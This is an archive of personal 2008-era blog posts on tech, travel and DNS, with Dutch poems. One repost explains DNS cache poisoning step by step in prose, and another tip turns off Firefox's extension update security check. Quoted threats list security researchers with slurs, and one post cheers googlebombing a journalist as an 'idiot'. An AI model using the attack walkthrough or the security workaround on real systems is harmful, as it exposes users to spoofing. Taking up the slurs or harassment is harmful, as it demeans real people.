How difficult a message is that? Well it seem really really difficult. The investor eveybody loves to love, Warren Buffett, is making a bundle and screaming on the top of his lungs that he does and so should you. Buy equities.

Because my ties with a couple of people who work for @ at SURFnet, I accepted an invitation to do a presentation. The audience consists of mainly university students and technical employees of universities so the question was if I could share some light on the differences of working at really big companies.

I tried :P

The differences are so extreme that sometimes it seems as if our methods and challenges have no shared needs or issues. This is not true. We fight the same monsters, technically, we just have a different landscape.

Think of it like BF2 & CoD.

A fun day with some excellent content brought by very capable people so I am happy to say that these where 2 days well spend. Since this is a university environment, speakers where much more encouraged to give some juicy details, details you would normally not out with a mic in your face. The questions are of such relevance to the issues discussed and not aimed at getting quotable 'bedroom secrets' so many a PR person would feel uncomfertable with the intemicy of details exchanged.

Exectly the kind of details & environment I like and can actually use in my day to day job.

SURFnet at all: thank you!

I love real good Baklava. The best in Istanbul you have to buy at Karakoy Gulluoglu in the Rihtum street, Karakoy. It is close to the Galata Tower.

See for yourself:

Grotere kaart weergeven

I met the founder, Mr Mustafa Gullu who started the shop and workplace in 1949. Since then not a single other shop was opened. If you want the best Baklava in Istanbul, you have to go here. No alternatives :D

Since I normally stay at the Moevenpick and it takes about 30 minutes of frantic driving throug the city. Cab driving in turkey is something that follows a few simple rules:

Change lanes, just because you can
Do NOT look to the cars in front of you
Keep no distance

Being a passenger means you avoid sitting next to the drivers and concentrate on anything but the traffic...

Of course picking on Microsoft has always been easy. Way too easy. So for me the laughing stock of this decenia has always been the inspired leader of Vodaphony and the AV bosses.

But MS has out done most of the attempts for gaining the top spot. Since absolutely no one wants or uses Vista, a low life MS marketing droid came up with the brilliant plan to show people Vista and not tell them it was Vista and record their happy feelings...Did not work, so plan B: get a well know dude to sell your stuff, that failed again.

That did not really work, so then they moved to the oldest trick in the book: if you can't beat them, copy them. So the market got a piece of MS interpretation of the fabulous "Hi I am a Mac, and I am a PC" commercials from Apple, but then done by Microsoft.

Now quess what? The stuff has been made on a ... MAC :D

Rock on loosers!

Years ago I hosted one of my servers over at Hurricane Electric [still LOVE that domain!]. At the time a small hosting company with Linux knowledge and a heart on the right spot.

The interface to the company was, well, minimal. A simple page with no 2.0 features or 1.0 features for that mater :D The service was good, even with complicated stuff like mail hosting and DNS stuff they would always have s good solution available. At times the tech guy [Mike Leber] would even ssh to my server and assist, really hands on & friendly.

Now they are the most reliable hosting company in the month August of 2008. Congratulations!

They run the tenth largest international network in the world.

Might be a nice idea to setup a total ipv6 host there...

de prinses voelt met een natte vinger
of haar strijkbout heet genoeg is
trekt haar kuisheidsgordel op
een beetje

haar witte ridder?
een rammellend harnas
een mannetje met jeuk

de prinses wacht
op de hitte van haar bout
tijd verstrijkt

-- Emma Klage

All systems go! The dutch secret service has retreated all their spies from Iran and one of them informed the media that this is because the states are going to attack Iran with drones, RSN.

Coming from the Dutch secret service directly, this has to be true :P

Let's hope that at least CNN has some webcam's rolling so we can enjoy the show.

...at least, that is what google gives when you search for "julie moult". The lady apparently thought she understood the concept of google bombing enough to write about it and... well, it back fired.

There are plenty people who do not like her style, her subjects and even the newspaper she writes for and of course the community loves making a point.

As one blogger puts it: Julie Moult is an idiot. And we're here to let her know.
Stealer of images (from top fellow Beau Bo d'Or) and all-round Daily Mail Hackette, Julie needs a wee lesson in the art of Googlebombing...

Google gives about 330 for "julie moult" +idiot right now. Guess that will be many more soon.
Update [14-sept-2008] 43.000 for "julie moult" +idiot right now.
Update [14-dec-2008] about 2,440 for "julie moult" +idiot

Since my last still standing PC is equipped with JMicron 363 SATA on board and SATA disks only, installing Windows is somewhat of a bitch since the last floppydrive left the house about 8 years ago.

XP is from the era that every machine still had a floppy drive so when you need to load an extra driver the only option you got is... supplying these drivers on a floppy.

Luckily there are more people who suffer from this handicapped feature and did something about it: nlite is the solution for XP. It enables one to easily make a slipstreamed XP image with added drivers [SATA comes to mind], Service Packs, patches, regional settings, XP key and much more.

Untill a week ago, I would rely on InfraRecorder [open source] to burn ISO's to CD's and DVD's but I noticed an issue with an ISO I had downloaded and tried to burn on a DVD: it was in CD format so the results where not what I expected. ImageBurn is much more advanced and able to convert CD format to DVD, on the fly. It does not get much easier then that.

So armed with a slipstreamed ISO, packed with SATA drivers, SP3 and then some, I booted the beast to be hit by various BSoD's... So that was my last attempt to have a pure window's machine.

Microsoft, it was good as long as it lasted but this is my final goodbye. I will still use your OS'es at times [for games & on dreaded corporate machines!] but I will not ever spend a cent on it again.

Vista might be lame to most, for me it is a bridge too far and something I am not even looking at.

Photo by algo

Since the latest DNS patch horror for those who _still_ use BIND over DJBDNS or OpenDNS, a lot of smart people who know a lot more about DNS then you & me together have been pointing to DNSsec as an even better cure.

DNSsec is a bitch to setup and use, even the guruus over at SANS are reluctantly and carefully touching the DNSsec waters. To actually benevit from the sec part of DNSsec, the end user would need to 'see' something like a nice big fat green thingy when connected to a DNSsec protected website, right?

Unfortunatly DNSsec is still not really widely deployed. There is no buildin firefox [or anyother browser for that matter] support.

Well for Firefox there is an extention for all your needs, to for DNSsec there is too. Called the DRILL extention. It would not install on my FF 3.0.1 since the DRILL exention ‘will not be installed because it does not provide secure updates’. Solution: go to the about page, create a new bolean called extensions.checkUpdateSecurity and set it to false. Try again & fail again: the extention does not support FF 3.x

So much for the nice effort.

GRRR!

For my MAC PowerBook A couple of months ago I bought a PCMCIA UMTS card with a KPN subscription for Mobile Internet. Costs a couple of euro but it provides me with Internet access when not being able to connect to a cable, for whatever reason.

I bought a MacBook a little later and since it does not have a PCMCIA slot, got myself a HuaWei E270 USB device to go with it. The HuaWei USB will automount, show the drivers that need to be installed and does so with all the correct settings preloaded: if one runs some sort of windows.

I do not.

Luckily KPN provides a dmg with the correct config from their website for us 'few' MAC users. Nice.

Unfortunatly my connection suffers from various problems:

connection speed sucks: 100 KB/s toprate up & down
HuaWeidrivers kernel panics OSX
syslog takes up to 80[!!!] % of the CPU when beeing flooded by the HuaWei driver

Of course the KPN helpdesk offers 'solutions' that do not cut ice:

Use another OS [riiight!]
Use another machine [Ok, give me one!]
Have the HuaWei driver installed by a service point [it is!]

Google assistance requiered. I took a random [1 in a million :P ] syslog line "RemovefromQueue: Enter, MaciSize" and found more people who are complaining their syslog was beeing filled up by the HuaWei driver messages, unstable connections & other jazz. In the HuaWei forums people are going rampant suggesting to go wired DSL because this seems not to be resolved although the user x00114004 [who's profile claims he works at HuaWei] says he has sent the information to the R&D department. Over at the Apple Support forums it is the same. In Australia too.

Most complaints are about the E220, but some mention the E226 and mine is the E270.

Luckily there is an updated version of the E270 driver available for OSX, unfortunatly it is wrapped in a .EXE, sigh...

So much for using China products sold by the KPN.

versleten ruggen

uitgebluste vuurtorens

gemankeerde meiers

droevige geeltjes

jammerlijke joetjes

verlopen vijfjes

kansarme knaken

zielige pieken

hongerende heitjes

snikkende stuivers

waardeloze centen

-- Emma Klage

Life saver: The Brazilian Zebu*-cow-intestine can be imported into Europe again.

After the bovine spongiform encephalopathy crisis it was verboten to import specific parts of the cows into Europe.

Since the Cervelat.CH needs the best available bowels for it's perfect curve & taste, only the Zebu's intestine can do. Thank G*d this is allowed again.

* Well actually it is more [5/8] Chanchim, but they look like Zebu.

als je niet buiten roken kunt
kunt je buiten roken

is fout

als U niet buiten roken kunt
kunt U buiten roken

is goed

...but you can give them to the birds and bees, I want money!

How is that, you give away a kick ass front-end, secure IMAP & POP, more storage space then anyone and a near perfect service and everyone is silently using ad-blockers to prevent you from making money and you accept that. But when there is ONE DAY of availability issues with that kick ass service, people go ape shit and you even apologize!

I would like to thank the gmail team for exceeding all my expectations, consistently.

..normal functions, like:

How come some hippy hackers can do all the cool stuff but Apple doesn't?

Even the PwnageTool looks better then iTimes FFS!

The "

Great Council of Internet Superheros" [internetsuperheros@hushmail.com] has compromized Petko D. Petkov [AKA pdp]'s, older mailbox RAR volumes and posted lots of it on RapidShare.

They threaten a whole bunch of people:

The Judge for Security Sellout Crimes hereby wages war against:

|/| Tom Ferris @ adobe.com security-protocols.com
|/| Matasano LLC @ matasano.com sockpuppet.org
|/| Nate Lawson @ rootlabs.com
|/| Joanna Rutkowska @ trannyvideos.com
|/| Petko D. Petkov @ googlemail.com gnucitizen.org
|/| Matt Richard @ idefense.com
|/| /\) Toralv Dirro @ mcafee.com AVERT Labs
|/|/\/ Dan Kaminsky @ ioactive.com arkham.wstn.ioactive.com
|/|\/ Dror Shalev @ sec.drorshalev.com
(\\\) Dragos Riuiu @ gaysecwest.com
(\\\) Thorsten Holz @ honeynet.org mwcollect.org
(\\\) Andre Protas @ eeye.com mwcollect.org (IDA leaker)
(\\\) Gadi Evron @ linuxbox.org kosherobese.org
(\\\) Valdis Kletnieks @ vt.edu & his alcoholic mother
/\\/\ Robert Lemos @ securityfocus.com
/ ,^./\ Ryan Naraine @ zdnet.com gmail.com
/ / \/\ Beyond Security @ Isreal, Gadi's bitch tits
/ / \/\ SecReview @ blogspot.com (gay reviews)
( ( )/) Juha-Matti Laurio @ netti.fi & Isreal (blog moron)
| | |/| Sergio Alvarez @ gmail.com nruns.com (AV rapist)
| | DIE |/| Theo de Raadt @ cvs.openbsd.org gaydate.com
| | |/| Alan Shimel @ yahoo.com stillsecure.com
( ( )/) Lance M. Havok @ dumb.lame.idiot.pl
\ \ / / kingcope/kcope @ gmx.net lame.idiot.de
\ `---' / Jennifer Granick @ whitefat.defender.lame
`-----' David Maynor @ gmail.com erratasec.com apple.com
Andrew Cushman @ microsoft.com gossip.sec

I wonder where this is going to end. Some big names here and I am sure not all will take it laying down. The compromise of pdp's account should warn people...

On a Vespa [style] Andrea Pininfarina the CEO of the best car designing companies ever, has died.

He and his Vespa scooter collided with a Ford Fiesta[FFS] about 8:15 a.m. in Trofarello.

Andrea died, Vespa broke, Fiesta lives: where is the justice in this?

Do not trust me, trust someone who knows:

As an investigator, I can only agree: everything you say can and will be used against you. One of my most respected teachers on the subject taught me an other trick. It comes down to screaming 'I NEED HELP' and I will leave it to the reader to think up the context as in when the time has come to [ab-]use this.

Most people are not even aware that LYING is allowed in the process of interrogation...

Thanks Bruce

Damn:

checking sys/xti.h presence... no
checking for sys/xti.h... no
checking for floor in -lm... yes
./configure: line 6742: syntax error near unexpected token `1.0.0,'
./configure: line 6742: ` AM_PATH_GTK(1.0.0, CFLAGS="$CFLAGS $GTK_CFLAGS"'

MyTraceRoute is a kick ass network connection 'debug' implementation that sends a sequence of ICMP ECHO requests to each hop to determine the quality of the link to each machine. As it does this, it prints running statistics about each machine.

iPhone:~ root# ./mtr --report www.google.com
HOST: iPhone Loss% Snt Last Avg Best Wrst StDev
1. 192.168.1.2 0.0% 10 2.0 9.6 1.9 72.4 22.1
[SNIP]
14. 12.88.155.14 66.7% 9 24.4 63.0 20.7 143.8 70.0
15. 216.239.48.110 87.5% 8 23.7 23.7 23.7 23.7 0.0
16. 66.249.95.149 25.0% 8 38.0 37.0 35.1 39.8 1.7
17. ??? 100.0 8 0.0 0.0 0.0 0.0 0.0
18. 209.85.253.161 14.3% 7 46.7 44.4 36.9 50.6 5.3
19. 74.125.47.104 85.7% 7 36.8 36.8 36.8 36.8 0.0

Simple, light & uses stuff we have been using for years, just a little better. The way I like it. It runs nicely on the iPhone, install it via Cydia, but for the love of cheese I can not compile it on my OSX Darwin MacBook.

Anyone?

1st of August is Switzerland's national day. On this day swiss people burn stuff, while speaking a funny language.
One of the two most beutifull countries in the world, in my book. And certainly the one country with the best possible implementation of a democracy.
They do not work to efficient, folowing Canada and being trailed by Trinidat & Tobago on the GDP list, but that makes it only extra pleasant to live there.
Today I wish all people with a @.CH email address a super nice day with many friends and even more fire!

As much as I loved stumbling on google when it was starting up, as eager I have been finding even better engines.

It is amazing how difficult it is to build a better google. The latest attempt is called cuil and it too, fails.

I challance you to find anything. So far only the simplest of searches yields useable results. Like searching for linkedin actually gives www.linkedin.com as a first hit: well done. Searching for 'mokum von Amsterdam' give two pages of something I once posted on the Wired blog and that has been replicated 1.000 times on other sites: no link to this blog or anything usefull.

Try searching for 'ING bank' in google and in cuil. Tell me why on earth ING Poland & Timisoara show up in Cuil on page one? How on earth did these guys fill up their repository?

Altavista does better FFS! [as a matter of fact, altavista showed me a nice bar in Berlin I will visit next time around].

Lessons learned: stick to google, use altavista more often, wait till cuil grows up, if ever.

hun hebben zij
klaagt de klant tegen de kapper

hun hebben zij
is niet goed Nederlands, meneer
wist de knipper

zij hebben haar, meneer
zij hebben haar

-- Frans Engels

To test, I let DHCP update my resolve file with the DNS servers of my [horribly slow!] KPN Internet mobile connection:

bash-3.2# cat /etc/resolv.conf
nameserver 208.67.222.222
nameserver 208.67.220.220
nameserver 62.133.126.28
nameserver 62.133.126.29

The top two address are my 'normal' DNS entries, from the fine folks of OpenDNS [who where secure since day one].

Now let's check the DNS servers from both OpenDNS & KPN mobile with a simple dig:

bash-3.2# dig @208.67.220.220 +short porttest.dns-oarc.net TXT
z.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
"208.69.34.6 is GOOD: 28 queries in 1061.8 seconds from 28 ports with std dev 17429.24"
bash-3.2# dig @208.67.222.222 +short porttest.dns-oarc.net TXT
z.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
"208.69.34.4 is GOOD: 26 queries in 4.3 seconds from 26 ports with std dev 20231.33"

bash-3.2# dig @62.133.126.28 +short porttest.dns-oarc.net TXT
z.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
"62.133.126.28 is POOR: 26 queries in 4.2 seconds from 1 ports with std dev 0.00"
bash-3.2# dig @62.133.126.29 +short porttest.dns-oarc.net TXT
z.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
"62.133.126.29 is POOR: 26 queries in 4.2 seconds from 1 ports with std dev 0.00"

Of course, nothing beats djbdbs, but for day today use, OpenDNS p0wnserz your provider's DNS hands down.

To keep your resolve.conf file save and clean on OSX and prevent DHCP from updating it, set the immutable bit:
chflags uchg /var/run/resolv.conf
To remove the flag use:
chflags nouchg /var/run/resolv.conf

Interesting idea over at TechCrunch: a simple, US$200 WebTablet, running FireFox & Skype.

For me this is the ultimate CloudPannel [zero hits ATM], or CloudTablet [less then 350 hits ATM], whatever you prefer.

I would like 5 or 10 laying around the house for easy web 2.0 access!

The cat is out of the bag. Yes, Halvar Flake figured out the flaw Dan Kaminsky will announce at Black Hat.

1.

Pretend for the moment that you know only the basic function of DNS — that it translates WWW.VICTIM.COM into 1.2.3.4. The code that does this is called a resolver. Each time the resolver contacts the DNS to translate names to addresses, it creates a packet called a query. The exchange of packets is called a transaction. Since the number of packets flying about on the internet requires scientific notation to express, you can imagine there has to be some way of not mixing them up.

Bob goes to to a deli, to get a sandwich. Bob walks up to the counter, takes a pointy ticket from a round red dispenser. The ticket has a number on it. This will be Bob’s unique identifier for his sandwich acquisition transaction. Note that the number will probably be used twice — once when he is called to the counter to place his order and again when he’s called back to get his sandwich. If you’re wondering, Bob likes ham on rye with no onions.

If you’ve got this, you have the concept of transaction IDs, which are numbers assigned to keep different transactions in order. Conveniently, the first sixteen bits of a DNS packet is just such a unique identifier. It’s called a query id (QID). And with the efficiency of the deli, the QID is used for multiple transactions.

2.

Until very recently, there were two basic classes of DNS vulnerabilities. One of them involves mucking about with the QID in DNS packets and the other requires you to know the Deep Magic.

First, QIDs.

Bob’s a resolver and Alice is a content DNS server. Bob asks Alice for the address of WWW.VICTIM.COM. The answer is 1.2.3.4. Mallory would like the answer to be 6.6.6.0.

It is a (now not) secret shame of mine that for a great deal of my career, creating and sending packets was, to me, Deep Magic. Then it became part of my job, and I learned that it is surprisingly trivial. So put aside the idea that forging IP packets is the hard part of poisoning DNS. If I’m Mallory and I’m attacking Bob, how can he distinguish my packets from Alice’s? Because I can’t see the QID in his request, and the QID in my response won’t match. The QID is the only thing protecting the DNS from Mallory (me).

QID attacks began in the olden days, when BIND simply incremented the QID with every query response. If you can remember 1995, here’s a workable DNS attack. Think fast: 9372 + 1. Did you get 9372, or even miss and get 9373? You win, Alice loses. Mallory sends a constant stream of DNS responses for WWW.VICTIM.COM. All are quietly discarded —- until Mallory gets Bob to query for WWW.VICTIM.COM. If Mallory’s response gets to your computer before the legitimate response arrives from your ISP’s name server, you will be redirected where Mallory tells you you’re going.

Obvious fix: you want the QID be randomly generated. Now Alice and Mallory are in a race. Alice sees Bob’s request and knows the QID. Mallory has to guess it. The first one to land a packet with the correct QID wins. Randomized QIDs give Alice a big advantage in this race.

But there’s a bunch more problems here:

If you convince Bob to ask Alice the same question 1000 times all at once, and Bob uses a different QID for each packet, you made the race 1000 times easier for Mallory to win.
If Bob uses a crappy random number generator, Mallory can get Bob to ask for names she controls, like WWW.EVIL.COM, and watch how the QIDs bounce around; eventually, she’ll break the RNG and be able to predict its outputs.
16 bits just isn’t big enough to provide real security at the traffic rates we deal with in 2008.

Your computer’s resolver is probably a stub. Which means it won’t really save the response. You don’t want it to. The stub asks a real DNS server, probably run by your ISP. That server doesn’t know everything. It can’t, and shouldn’t, because the whole idea of DNS is to compensate for the organic and shifting nature of internet naming and addressing. Frequently, that server has to go ask another, and so on. The cool kids call this “recursion”.

Responses carry another value, too, called a time to live (TTL). This number tells your name server how long to cache the answer. Why? Because they deal with zillions of queries. Whoever wins the race between Alice and Mallory, their answer gets cached. All subsequent responses will be dropped. All future requests for that same data, within the TTL, come from that answer. This is good for whoever wins the race. If Alice wins, it means Mallory can’t poison the cache for that name. If Mallory wins, the next 10,000 or so people that ask that cache where WWW.VICTIM.COM is go to 6.6.6.0.

3.

Then there’s that other set of DNS vulnerabilities. These require you to pay attention in class. They haven’t really been talked about since 1997. And they’re hard to find, because you have to understand how DNS works. In other words, you have to be completely crazy. Lazlo Hollyfeld crazy. I’m speaking of course of RRset poisoning.

DNS has a complicated architecture. Not only that, but not all name servers run the same code. So not all of them implement DNS in exactly the same way. And not only that, but not all name servers are configured properly.

I just described a QID attack that poisons the name server’s cache. This attack requires speed, agility and luck, because if the “real” answer happens to arrive before your spoofed one, you’re locked out. Fortunately for those of you that have a time machine, some versions of DNS provide you with another way to poison the name server’s cache anyway. To explain it, I will have to explain more about the format of a DNS packet.

DNS packets are variable in length and consist of a header, some flags and resource records (RRs). RRs are where the goods ride around. There are up to three sets of RRs in a DNS packet, along with the original query. These are:

Answer RR’s, which contain the answer to whatever question you asked (such as the A record that says WWW.VICTIM.COM is 1.2.3.4)
Authority RR’s, which tell resolvers which name servers to refer to to get the complete answer for a question
Additional RR’s, sometimes called “glue”, which contain any additional information needed to make the response effective.

A word about the Additional RR’s. Think about an NS record, like the one that COM’s name server uses to tell us that, to find out where WWW.VICTIM.COM is, you have to ask NS1.VICTIM.COM. That’s good to know, but it’s not going to help you unless you know where to find NS1.VICTIM.COM. Names are not addresses. This is a chicken and egg problem. The answer is, you provide both the NS record pointing VICTIM.COM to NS1.VICTIM.COM, and the A record pointing NS1.VICTIM.COM to 1.2.3.1.

Now, let’s party like it’s 1995.

Download the source code for a DNS implementation and hack it up such that every time it sends out a response, it also sends out a little bit of evil — an extra Additional RR with bad information. Then let’s set up an evil server with it, and register it as EVIL.COM. Now get a bunch of web pages up with IMG tags pointing to names hosted at that server.

Bob innocently loads up a page with the malicious tags which coerces his browser resolve that name. Bob asks Alice to resolve that name. Here comes recursion: eventually the query arrives at our evil server. Which sends back a response with an unexpected (evil) Additional RR.

If Alice’s cache honors the unexpected record, it’s 1995 —- buy CSCO! —- and you just poisoned their cache. Worse, it will replace the “real” data already in the cache with the fake data. You asked where WWW.EVIL.COM was (or rather, the image tags did). But Alice also “found out” where WWW.VICTIM.COM was: 6.6.6.0. Every resolver that points to that name server will now gladly forward you to the website of the beast.

4.

It’s not 1995. It’s 2008. There are fixes for the attacks I have described.

Fix 1:

The QID race is fixed with random IDs, and by using a strong random number generator and being careful with the state you keep for queries. 16 bit query IDs are still too short, which fills us with dread. There are hacks to get around this. For instance, DJBDNS randomizes the source port on requests as well, and thus won’t honor responses unless they come from someone who guesses the ~16 bit source port. This brings us close to 32 bits, which is much harder to guess.

Fix 2:

The RR set poisoning attack is fixed by bailiwick checking, which is a quirky way of saying that resolvers simply remember that if they’re asking where WWW.VICTIM.COM is, they’re not interested in caching a new address for WWW.GOOGLE.COM in the same transaction.

Remember how these fixes work. They’re very important.

And so we arrive at the present day.

5.

Let’s try again to convince Bob that WWW.VICTIM.COM is 6.6.6.0.

This time though, instead of getting Bob to look up WWW.VICTIM.COM and then beating Alice in the race, or getting Bob to look up WWW.EVIL.COM and slipping strychnine into his ham sandwich, we’re going to be clever (sneaky).

Get Bob to look up AAAAA.VICTIM.COM. Race Alice. Alice’s answer is NXDOMAIN, because there’s no such name as AAAAA.VICTIM.COM. Mallory has an answer. We’ll come back to it. Alice has an advantage in the race, and so she likely beats Mallory. NXDOMAIN for AAAAA.VICTIM.COM.

Alice’s advantage is not insurmountable. Mallory repeats with AAAAB.VICTIM.COM. Then AAAAC.VICTIM.COM. And so on. Sometime, perhaps around CXOPQ.VICTIM.COM, Mallory wins! Bob believes CXOPQ.VICTIM.COM is 6.6.6.0!

Poisoning CXOPQ.VICTIM.COM is not super valuable to Mallory. But Mallory has another trick up her sleeve. Because her response didn’t just say CXOPQ.VICTIM.COM was 6.6.6.0. It also contained Additional RRs pointing WWW.VICTIM.COM to 6.6.6.0. Those records are in-bailiwick: Bob is in fact interested in VICTIM.COM for this query. Mallory has combined attack #1 with attack #2, defeating fix #1 and fix #2. Mallory can conduct this attack in less than 10 seconds on a fast Internet link.

----

On a side note: can stuff no longer published but found in google's cache be copyrighted?

Great feature: geotagging the images taken with the iPhone [already the most Popular Cameraphone on Flickr].

Just imagion that you take photos during the holiday and all you need to do is dump them in, say, google earth and all pics are shown in the correct location. Right, that was the plan. Unfortunatly Apple made a couple of errors with the implementation, again.

The UIImagePicker application that is used when you email a photo from the iPhone, strips out the EXIF location data, DUH! iPhoto mutilates [strips the "Ref" tag] the EXIF geodata when resizing photos, DUH.

So what you get is third party apps that sort-of-help, like AirMe. It will upload the photo to Flickr and geotag it, but then you have to take the pic with AirMe and have NO geodata stored in the EXIF data of the photo at all, and that is bad.

Who knows, maybe if Apple would put a little less invain effort in the locking down of the iPhone they'd be able to get MMS working? Some more features in the camera? Geotagging stored correctly? How difficult is that? How come 17 year old's CAN do that but a multi bilion company can't?
Photo source

Good thief's maybe, but crooks. Living with mama till >30. Not being able to clean their own rubbish. Lovely, but lousy cars makers. And so on.

To wrap it up, even in the IT world they show up. And the pain got a name: Zibri. A thief, but then in code.

Read this to get an idea about this crook:

The following opinions are mine, and not those of the DevTeam as a whole, although many members agree with me:

Free thoughts...

There's something that's been on my chest for a while, and it's been bothering others on the team as well. The name of this particular thorn in our sides begins with the letter Z and ends with "ibri". Yes, I'm sure all of you are rolling your eyes at the "drama" we hacker "kids" are stirring up, but I'm sure if you had your work taken without permission, you would feel the same way. It's particularly galling that he is still spreading FUD on his blog in an attempt to save face. I'm going to try to address some of them in this post.

Zibri implies that our jailbreak is not "real", saying instead that our release is a "software upgrade, total internat [sic] firmware modification and custom firmware".

For him, a "real hack" works in a few minutes because it only needs to modify a few bytes here and there.

When Pwnage 1.0 was released, it was indeed the ultimate hack for the iPhone/iPod Touch. Never before had the devices been under the user's control from the very bottom up. Prior, less sophisticated jailbreaks were still subject to the whims of the kernel, which couldn't be modified because the bootloader checked its signature and refused to boot if it was incorrect.

Back in those days, the definition of "hack" above was still a feasible one, as the chain of trust ended at the kernel. Once you gained write access to the root filesystem, you could run arbitrary programs and make patches at will to many system components. Indeed, many such patches were needed, to make activation allow unapproved SIM cards, and to make Springboard display unauthorized apps.

Fast forward back to the present, and you'll see the situation has changed. Solutions that using a ramdisk simply made a change or two to the filesystem now must contend with the mighty kernel's signature checking of all installed apps and libraries. Mounting the root filesystem and modifying /etc/fstab to make it writable is quite alright, but the moment you make patches for activation or anything else, the kernel will refuse to run the modified programs, unless you can somehow steal Apple's private signing key. Furthermore, such a jailbreak would be essentially useless because the system would refuse to run any of your custom software (such as Installer.app or Cydia), again because of the lack of signatures on it.

Given the above situation, it becomes clear that if you want to use 2.0 for anything but screenshots, you either need to get ahold of Apple's signing key (start preparing your army now) or you need to patch the 2.0 kernel. Hard as we tried, we couldn't find much of an army, so we took the latter approach.

We adapted our Pwnage technique to the 2.0 firmware, using a new unreleased exploit that we'd been keeping to ourselves, in the hope that Apple wouldn't patch it. This allows us to cut the signature checks out of the device bootloaders, allowing us to remove signature checking from the kernel, and enabling you to run all the custom software and patches you please.

Please note other than my facetious army suggestions, patching the bootloaders is the _only_ way to get a functional jailbreak for 2.0. Under the aforementioned definition of "real hack", there is no such thing as a "real hack" for 2.0. I hope you agree with me by now that Pwnage, the exploit it uses, and its subsequent obliteration of the device's chain of trust, is a "real hack".

More FUD is spread by this undying rumor of "Palladium" (or TPM) being used fully on Apple's devices, making it impossible for you "to play online with legit buyers." This is nothing but uninformed nonsense, and while there is the potential for some definition of trusted computing on iPhone and iPod Touch, Apple is not using it, and they have no way to remotely distinguish your pwned device from a legitimately activated one. This should have been obvious from our examples of running App Store applications next to our custom ones, but "obvious" is a very relative term.

On an unrelated note, I and the others take issue with Zibri's definition of open source. No, Linux distributions are not stealing, but our work was not released as open source, with any kind of permissive license, so the open source he brings into the discussion is entirely irrelevant. He took our work, our private exploits (such as the unreleased one we were able to use for Pwning 2.0), and without our permission (trying to defame us with fake comments, no less) used them in his work, that he made significant amounts of money on. He did this not by selling "his work", but by portraying himself as the reasonable "dev" who fought against the tyranny of the dev team and Apple, and requesting donations to his "cause" (recall his older iphone-elite.googlecode.com and his self-righteous bashing of the dev team for accepting donations; funny how principles change). Furthermore, with his millions of hits and occasionally obscene ads, he made his site into a complete money machine. So although he did not sell our work, it is more than fair to say that he made plenty of money from it.

And as to his most recent update, I'm not really sure what to say. I'd call it the swan song, but that would imply he was a swan, which is certainly not my intention. Maybe the chicken song would be more appropriate. ZiPhone was "developed" 9 months after the iPhone release, so he's justifying his lack of releases now, okay. Once again he pushes the "real hack" idea, which we hope we've already pounded sufficiently into the ground above. We're not sure how the fact that we were so popular it took down multiple unmetered gigabit servers is a point in his favor. We've had close to a third of his total visits since last week.

I want to dedicate a special paragraph to something that's been bugging us for a while, too. The myth that ZiPhone never harmed a phone. Certainly, we all know that iPhones are almost impossible to brick, but flashing unmatched fls/eep pairs to the baseband is plain irresponsible on Zibri's part. Does he not care about messing up phones, or does he simply not know better? And the laughable WiFi fix he released for issues that he called "user error" (actually a consequence of the above design choice) where he unconditionally set every ZiPhone WiFi MAC address to 0:Z:i:b:r:i? How did he expect that to work? It doesn't take a networking genius to figure out that two such phones on the same network would cause havoc, and indeed it did.

The following few "facts" on his blog are just more FUD. Our tools can't kill iPhones, because the only way to kill an iPhone through software (and even then just the radio) is to flash an incomplete image as the S-Gold bootloader. Apple cannot remotely kill pwned iPhones because as I mentioned earlier, it has no way to detect which iPhones are pwned.

I'm not sure why he goes on to say that you should be satisfied with Apple's AppStore. It certainly contains many good programs, but to quote Zibri just a couple of weeks earlier:

As of today you will have 2 choices:
1) Believe in the community and don't upgrade to 2.0
2) Say goodbye to Installer and freedom and upgrade.

So are you suggesting we say goodbye to freedom now? I guess we can't expect much from someone who made a reputation for himself by denouncing the devteam for accepting donations (not even soliciting them) and who now has a website full of ads, exhortations to donate, and very little content? Now we have given you a nice opportunity to upgrade to 2.0, use the AppStore _and_ use community apps. If he really wanted the good of the community, why is he not recommending it?

I would normally just ignore his entries, but as many still look at Zibri as an authority in the scene, I felt the need to dispel some of the FUD he was spreading, and finally denounce his pathetic attempts to stay relevant. Posting the latest root filesystem key after we release PwnageTool? PwnageTool exposes all the keys right within its plist files. And if he knew about the DFU exploit all along, as he implies, why didn't he take advantage of it? We would like to see him write up an article on how it all works, just to prove that Zibri knows all.

Thank you for your patience reading this. We will continue working hard on providing quality hacks and software, but please, to anyone who's tempted, stop spreading bullshit about us and our work. source

My I-EGO is pretty big, people tell me. But how big is it really? Time to find out!

Enter your name & domain and let the www.egosurf.org do the rest.

My 'mokum von Amsterdam' EGO is a mere 4700 points but I am sure your's a lot bigger :P

Shabat shalom!

I would like a pile of these, right next to the complaint & request notes.

A big pile so I could formalize & incorporate the process in my daily live.

Now who would deserve one signed by you?

Shht!

It is still secret, the current internal BETA for the long awaited BF2 1.5 patch is currently running in Spain and guess what:

3 new maps will be released with it [act of G*d clause applies].

The names of the maps I cannot reveal but there will be at least one _you_ will like :P

In Rotterdam there is a [modest] queue for the T-Mobile shop that will start selling the iPhone 2.0 from 00:00 sharp.

500 phones are available to those that have no friends, no home, no sex and no lust for beer.

Mine will fall out of the air real soon now, but I can not say I am half as tense as I was with the iPhone orginal a year ago.

DenyHosts blocked 44 new ssh user scanning hosts in the last 13 hours. That is a lot.

Normally days with >5 new hosts caught by my lone sensor are remarkable, it happens not more often then 4 times a month. This month has been truly busy however. July 1st 10 new addresses, July 3rd 14, where in the whole month of June there where 2 days with >5 [6 & 8 on the 28th & 30th. A busy month globally] with a grant total of 28 for the whole month.

Nothing advanced either, like the botnet-like scanning in May.

This is for those hosts who made it to the largest blacklist of all times.

My users are smarter then yours!

1. Firefox 221 56.81%
2. Internet Explorer 123 31.62%
3. Safari 34 8.74%
4. Opera 8 2.06%
5. Mozilla 2 0.51%
6. Netscape 1 0.26%

I think this is a first: a google car in Amsterdam. Photo taken on the 1st of July 2008 in Amsterdam, on the Gaasperdammerweg, Amsterdam after I picked up the car coming out of the Huigenbos [I know, all these streets do not sound like Amsterdam... but it is, techincally speaking].

Grotere kaart weergeven

